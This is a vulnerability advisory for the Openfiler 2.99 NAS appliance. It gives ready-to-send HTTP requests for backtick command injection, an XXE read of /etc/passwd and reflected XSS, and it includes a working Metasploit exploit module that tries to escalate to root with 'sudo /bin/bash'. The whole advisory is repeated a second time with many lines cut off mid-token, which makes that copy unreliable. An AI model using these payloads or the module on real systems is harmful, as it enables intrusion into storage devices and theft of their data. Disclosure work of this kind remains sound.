#Tested on Openfiler NAS/SAN Appliance version 2.99
#Author: MiDoveteMollare
#Date: 10 June 2014
OS Command Injection (after authentication) #1
page: services_iscsi_target.html
parameter: password
POST /admin/services_iscsi_target.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_iscsi_target.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
username=AAA&addChapUser=Add& usertype=OutgoingUser& password=aaaa`touch%20/tmp/ test`
OS Command Injection (after authentication) #2
page: volumes_iscsi_targets.html
parameter: newTgtName
POST /admin/volumes_iscsi_targets.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_iscsi_targets.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=aaaa` touch%20/tmp/bbbbb`
Path Traversal (after authentication), via an external XML entity pointing at a local file, declared in the XML request body below:
page: system_ups.html
parameter: TinkerAjaxArgs[]
POST /admin/system_ups.html HTTP/1.1
Host: IP:446
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST https://IP:446/admin/system_ups.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://IP:446/admin/system_ups.html
Content-Length: 1180
Cookie: template=classic; lng=en; subNavIscsi-targetset=true;
subNavIscsi-lunmap=false; subNavIscsi-networkacl=false;
subNavIscsi-chapauth=false; usercookie=openfiler; passcookie=password
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
TinkerAjax=addUPSDevice& TinkerAjaxr=1402385862174& TinkerAjaxArgs[]=<!DOCTYPE% 20foo%20[<!ENTITY%20xxe915a7% 20SYSTEM%20"file%3a%2f%2f% 2fetc%2fpasswd">%20]><tinker- query>%0a%09<object><name> devicenameinput<%2fname>%0a% 09%09<value>APC%20-%20Back- UPS%20CS%20350%20USB%2fSerial% 26xxe915a7%3b<%2fvalue><% 2fobject>%0a%09<object><name> driverinput<%2fname>%0a%09%09< value>apcsmart<%2fvalue><% 2fobject>%0a%09%09<object>< name>upsstatusinput<%2fname>% 0a%09%09<value>1<%2fvalue><% 2fobject>%0a%09<object><name> confignameinput<%2fname>%0a% 09%09<value>ups0<%2fvalue><% 2fobject>%0a%09<object><name> portinput<%2fname>%0a%09%09< value>ttyS0<%2fvalue><% 2fobject>%0a%09<object><name> descinput<%2fname>%0a%09%09< value>dsa<%2fvalue><%2fobject> %0a%09<object><name> sorderinput<%2fname>%0a%09%09< value>0<%2fvalue><%2fobject>% 0a%09<object><name>cableinput< %2fname>%0a%09%09<value> simple<%2fvalue><%2fobject>% 0a%09<object><name> sdtypeinput<%2fname>%0a%09%09< value>0<%2fvalue><%2fobject>% 0a%09<object><name> configformsubm
itbutton<%2fname>%0a%09%09< value>Add%20Device<%2fvalue><% 2fobject>%0a%09<object><name> configformcancelbutton<% 2fname>%0a%09%09<value>Cancel< %2fvalue><%2fobject>%0a%0a<% 2ftinker-query>%0a
Passwords are saved in clear text in cookies:
HTTP/1.1 302 Found
Date: Mon, 09 Jun 2014 12:09:45 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: usercookie=root; path=/; secure
Set-Cookie: passcookie=mypassword; path=/; secure
Cookies are not protected with HttpOnly:
HTTP/1.1 200 OK
Date: Sun, 02 Feb 2003 01:01:03 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language_code=it_IT; expires=Mon, 02-Feb-2004 01:01:04 GMT;
path=/
Set-Cookie: usercookie=openfiler; path=/; secure
Set-Cookie: passcookie=password; path=/; secure
Reflected XSS (before authentication):
Tested with Chrome, not working on Firefox.
https://IP:446/uptime.html? TinkerAjax=getUptime0fa3e]]% 3E%3Cscript%20xmlns=%22http:// www.w3.org/1999/xhtml%22%3E% 3C![CDATA[alert%28document. cookie%29]]%3E%3C/script%3E[[& TinkerAjaxr=1402315831409
Reflected XSS (after authentication):
page: services_ftp.html
parameters: MaxInstances, PassivePorts, Port, ServerName, TimeoutLogin,
TimeoutNoTransfer, TimeoutStalled,
POST /admin/services_ftp.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_ftp.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 262
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
TimeoutIdle=600&TimesGMT=on& ServerName=FTP+Server& TimeoutStalled=3600& MaxInstances="><script>alert( 1)</script>&TimeoutLogin=120& AllowForeignAddress=on& IdentLookups=on&Port=21& TimeoutNoTransfer=900& PassivePorts=55535+65534& ServerIdent=on&UseReverseDNS= on&applyftpsettings=Apply& reload=on
Reflected XSS (after authentication):
page: /admin/system.html
parameters: dns1, dns2
GET
/admin/system.html?dns1=1.1.1. 1"><script>alert(1)</script>& dns2=1.1.1.1&gateway=DHCP+ Controlled&netconf=Update& hostname=localhost.localdomain
Reflected XSS (after authentication):
page: /admin/volumes_iscsi_targets.html
parameter: newTgtName
POST /admin/volumes_iscsi_targets.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_iscsi_targets.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=iqn. 2006-01.com.openfiler%3atsn">< script>alert(1)<%2fscript>
Reflected XSS with the User-Agent HTTP header in the following pages (after
authentication):
/account/language.html
/account/login.html
/account/password.html
/admin/account_groups.html
/admin/account_users.html
/admin/services.html
/admin/services_ftp.html
/admin/services_iscsi_target.html
/admin/services_rsync.html
/admin/system_clock.html
/admin/system_info.html
/admin/system_ups.html
/admin/volumes_editpartitions.html
/admin/volumes_iscsi_targets.html
e.g.:
POST /account/language.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)--><script>alert( 1)</script>
PHP version leak:
https://IP:446/phpinfo.html
Draft of a Metasploit Module for command injection #2
require 'msf/core'
# Draft Metasploit module for finding "OS Command Injection #2" above: the
# newTgtName parameter of /admin/volumes_iscsi_targets.html reaches a shell,
# so a value wrapped in backticks is executed as the web application's user.
# The module sends the same request the advisory shows, authenticating only
# with the usercookie/passcookie pair that carries the credentials in clear
# text (see "Passwords are saved in clear text in cookies" above).
#
# Note (review): several literals below are split across lines exactly as the
# page shows them (the two option descriptions, the two regexes in #check) and
# the request URI in #exploit contains a stray space; these look like
# paste/wrapping artifacts and are left as found.
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote:: HttpClient
# Module metadata and user options.
#
# @param info [Hash] extra module info merged in by update_info
#
# Payload: 'Arch' => ARCH_CMD with PayloadType 'cmd' -- the payload is a
# shell command string, which is what the backtick injection consumes; NUL is
# the only bad character declared and NOPs are disabled.
# Options: RPORT 446 (the appliance's HTTPS admin port used throughout the
# advisory), SSL on by default, and USERNAME/PASSWORD defaulting to
# 'openfiler' / 'password'. Valid credentials are required: the injection is
# only reachable after authentication.
def initialize(info={})
super(update_info(info,
'Name' => "Openfiler v2.99 Volumes Iscsi Command Execution",
'Description' => %q{
This module exploits a vulnerability in Openfiler v2.99
which could be abused to allow authenticated users to execute
arbitrary
code under the context of the 'openfiler' user.
},
'License' => MSF_LICENSE,
'Author' =>
[
' <MiDoveteMollare[at]gmail.com> ' # Discovery and exploit
],
# All reference identifiers are still placeholders ('TBD') in this draft.
'References' =>
[
['BID', 'TBD'],
['URL', 'TBD'],
['OSVDB', 'TBD'],
['EDB', 'TBD']
],
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
}
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Jun 10 2014",
'DefaultTarget' => 0))
# Note (review): the two description strings below contain a literal newline
# where the page wrapped them; presumably not intended.
register_options(
[
Opt::RPORT(446),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username for the
application', 'openfiler']),
OptString.new('PASSWORD', [true, 'The password for the
application', 'password'])
], self.class)
end
# Fingerprints the target by fetching '/' without credentials.
#
# @return [Exploit::CheckCode] Appears when the page advertises
#   "Distro Release: Openfiler [NE]SA 2.x", Detected when only the
#   "Openfiler Storage Control Center" title is present, Unknown when the
#   connection fails, Safe otherwise.
#
# Note (review): both regexes contain a literal newline where the page
# wrapped them (after "Distro" and after "Openfiler"), so as written they
# only match a body that breaks the line at the same place -- presumably a
# paste artifact rather than intent.
def check
# retrieve software version from login page
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
})
if res and res.code == 200 and res.body =~ /<strong>Distro
Release: <\/strong> Openfiler [NE]SA 2\./
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /<title>Openfiler
Storage Control Center<\/title>/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
# Runs once a session is opened: issues `sudo /bin/bash` on the new shell,
# i.e. tries to move from the 'openfiler' web user to root. Whether that
# succeeds depends on the appliance's sudoers policy, which this file does not
# show. From a defender's view this is the step to watch: a sudo invocation
# by the web service account is a strong signal on its own. The leading space
# inside the string is kept as found.
#
# @param client [Object] the freshly created session
def on_new_session(client)
client.shell_command_token(" sudo /bin/bash")
end
# Sends the injected request.
#
# Flow: URI-encodes the command payload followed by '&' (presumably so the
# shell backgrounds the command and the page request returns), then POSTs to
# /admin/volumes_iscsi_targets.html with the payload in backticks inside
# newTgtName, authenticated solely by the usercookie/passcookie cookies, with
# a 25-second timeout. Connection errors from send_request_cgi are turned
# into Failure::Unknown.
#
# Response handling, as written:
#   - any 302 is reported as success;
#   - the elsif that checks for a Location of /index.html?redirect (which the
#     author treats as the authentication-failure redirect) can never run,
#     because the first branch already matches every 302 -- so wrong
#     credentials are reported as "Payload sent successfully" instead of
#     Failure::NoAccess;
#   - anything else (including a nil res) is Failure::Unknown.
#
# Detection note: the request stands out in the web server's access log as a
# POST to this URI whose newTgtName value contains backticks, sent with the
# clear-text credential cookies.
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("#{ payload.raw}&")
# send payload
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
# Note (review): the URI below contains a space before "html" as shown on the
# page; left as found.
'uri' => "/admin/volumes_iscsi_targets. html",
'method' => "POST",
'data' => "addNewTgt=Add&newTgtName= aaaa`#{cmd}`",
# Credentials travel in plain cookies; no session token is involved.
'cookie' => "usercookie=#{user}; passcookie=#{pass};",
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
fail_with(Failure::Unknown, 'Connection failed')
end
if res and res.code == 302
print_good("#{peer} - Payload sent successfully")
# Unreachable: every 302 is consumed by the branch above.
elsif res and res.code == 302 and res.headers['Location'] =~
/\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else
fail_with(Failure::Unknown, 'Sending payload failed')
end
end
end
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.
#Author: MiDoveteMollare
#Date: 10 June 2014
OS Command Injection (after authentication) #1
page: services_iscsi_target.html
parameter: password
POST /admin/services_iscsi_target.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_
Content-Type: application/x-www-form-
Content-Length: 83
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
username=AAA&addChapUser=Add&
OS Command Injection (after authentication) #2
page: volumes_iscsi_targets.html
parameter: newTgtName
POST /admin/volumes_iscsi_targets.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_
Content-Type: application/x-www-form-
Content-Length: 49
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=aaaa`
Path Traversal (after authentication), via an external XML entity pointing at a local file, declared in the XML request body below:
page: system_ups.html
parameter: TinkerAjaxArgs[]
POST /admin/system_ups.html HTTP/1.1
Host: IP:446
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Method: POST https://IP:446/admin/system_
Content-Type: application/x-www-form-
Referer: https://IP:446/admin/system_
Content-Length: 1180
Cookie: template=classic; lng=en; subNavIscsi-targetset=true;
subNavIscsi-lunmap=false; subNavIscsi-networkacl=false;
subNavIscsi-chapauth=false; usercookie=openfiler; passcookie=password
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
TinkerAjax=addUPSDevice&
itbutton<%2fname>%0a%09%09<
Passwords are saved in clear text in cookies:
HTTP/1.1 302 Found
Date: Mon, 09 Jun 2014 12:09:45 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: usercookie=root; path=/; secure
Set-Cookie: passcookie=mypassword; path=/; secure
Cookies are not protected with HttpOnly:
HTTP/1.1 200 OK
Date: Sun, 02 Feb 2003 01:01:03 GMT
Server: Apache/2.2.9 (rPath)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: language_code=it_IT; expires=Mon, 02-Feb-2004 01:01:04 GMT;
path=/
Set-Cookie: usercookie=openfiler; path=/; secure
Set-Cookie: passcookie=password; path=/; secure
Reflected XSS (before authentication):
Tested with Chrome, not working on Firefox.
https://IP:446/uptime.html?
Reflected XSS (after authentication):
page: services_ftp.html
parameters: MaxInstances, PassivePorts, Port, ServerName, TimeoutLogin,
TimeoutNoTransfer, TimeoutStalled,
POST /admin/services_ftp.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/services_
Content-Type: application/x-www-form-
Content-Length: 262
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
TimeoutIdle=600&TimesGMT=on&
Reflected XSS (after authentication):
page: /admin/system.html
parameters: dns1, dns2
GET
/admin/system.html?dns1=1.1.1.
Reflected XSS (after authentication):
page: /admin/volumes_iscsi_targets.
parameter: newTgtName
POST /admin/volumes_iscsi_targets.
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://IP:446/admin/volumes_
Content-Type: application/x-www-form-
Content-Length: 69
Cookie: language_code=it_IT; usercookie=openfiler; passcookie=password;
template=classic; lng=en
addNewTgt=Add&newTgtName=iqn.
Reflected XSS with the User-Agent HTTP header in the following pages (after
authentication):
/account/language.html
/account/login.html
/account/password.html
/admin/account_groups.html
/admin/account_users.html
/admin/services.html
/admin/services_ftp.html
/admin/services_iscsi_target.
/admin/services_rsync.html
/admin/system_clock.html
/admin/system_info.html
/admin/system_ups.html
/admin/volumes_editpartitions.
/admin/volumes_iscsi_targets.
e.g.:
POST /account/language.html HTTP/1.1
Host: IP:446
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)--><script>alert(
PHP version leak:
https://IP:446/phpinfo.html
Draft of a Metasploit Module for command injection #2
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::
def initialize(info={})
super(update_info(info,
'Name' => "Openfiler v2.99 Volumes Iscsi Command Execution",
'Description' => %q{
This module exploits a vulnerability in Openfiler v2.99
which could be abused to allow authenticated users to execute
arbitrary
code under the context of the 'openfiler' user.
},
'License' => MSF_LICENSE,
'Author' =>
[
' <MiDoveteMollare[at]gmail.com>
],
'References' =>
[
['BID', 'TBD'],
['URL', 'TBD'],
['OSVDB', 'TBD'],
['EDB', 'TBD']
],
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
}
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Jun 10 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(446),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'The username for the
application', 'openfiler']),
OptString.new('PASSWORD', [true, 'The password for the
application', 'password'])
], self.class)
end
def check
# retrieve software version from login page
vprint_status("#{peer} - Sending check")
begin
res = send_request_cgi({
'uri' => '/'
})
if res and res.code == 200 and res.body =~ /<strong>Distro
Release: <\/strong>
return Exploit::CheckCode::Appears
elsif res and res.code == 200 and res.body =~ /<title>Openfiler
Storage Control Center<\/title>/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
client.shell_command_token("
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cmd = Rex::Text.uri_encode("#{
# send payload
print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
begin
res = send_request_cgi({
'uri' => "/admin/volumes_iscsi_targets.
'method' => "POST",
'data' => "addNewTgt=Add&newTgtName=
'cookie' => "usercookie=#{user}; passcookie=#{pass};",
}, 25)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable,
::Rex::ConnectionTimeout
fail_with(Failure::Unknown, 'Connection failed')
end
if res and res.code == 302
print_good("#{peer} - Payload sent successfully")
elsif res and res.code == 302 and res.headers['Location'] =~
/\/index\.html\?redirect/
fail_with(Failure::NoAccess, 'Authentication failed')
else
fail_with(Failure::Unknown, 'Sending payload failed')
end
end
end
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.